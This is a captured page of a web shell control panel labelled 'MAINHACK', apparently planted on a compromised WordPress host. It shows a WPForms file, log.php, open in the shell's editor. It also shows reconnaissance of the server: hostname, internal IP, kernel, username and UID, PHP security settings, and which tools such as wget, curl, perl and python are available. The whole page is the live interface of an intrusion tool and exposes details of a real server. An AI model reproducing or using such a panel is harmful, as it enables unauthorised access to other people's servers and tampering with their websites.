[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: log.php
<?php /** * Single Payment page - Log metabox. * * @since 1.8.2 * * @var array $logs Logs. */ if ( ! defined( 'ABSPATH' ) ) { exit; } ?> <div id="wpforms-payment-logs" class="postbox"> <div class="postbox-header"> <h2 class="hndle"> <span><?php esc_html_e( 'Log', 'wpforms-lite' ); ?></span> </h2> </div> <div class="inside"> <?php if ( empty( $logs ) ) : ?> <span class="wpforms-payment-no-logs"><?php esc_html_e( 'No Logs', 'wpforms-lite' ); ?></span> <?php endif; ?> <?php foreach ( $logs as $log ) : $item = json_decode( $log['value'], false ); $date_time = sprintf( /* translators: %1$s - date, %2$s - time when item was created, e.g. "Oct 22, 2022 at 11:11 am". */ __( '%1$s at %2$s', 'wpforms-lite' ), wpforms_date_format( $item->date, 'M j, Y', true ), wpforms_time_format( $item->date, '', true ) ); if ( empty( $item->value ) ) { continue; } ?> <div class="wpforms-payment-log-item" > <span class="wpforms-payment-log-item-value"> <?php echo esc_html( $item->value ); ?> </span> <span class="wpforms-payment-log-item-date"> <?php echo esc_html( $date_time ); ?> </span> </div> <?php endforeach; ?> </div> </div>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: webm021.cluster127.gra.hosting.ovh.net
Server IP: 10.127.20.21
PHP Version: 8.4.22
Server Software: Apache
System: Linux webm021.cluster127.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
HDD Total: 14.32 GB
HDD Free: 8.45 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
Exists
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: vcomplcotr
User ID (UID): 38697
Group ID (GID): 100
Script Owner UID: 38697
Current Dir Owner: 38697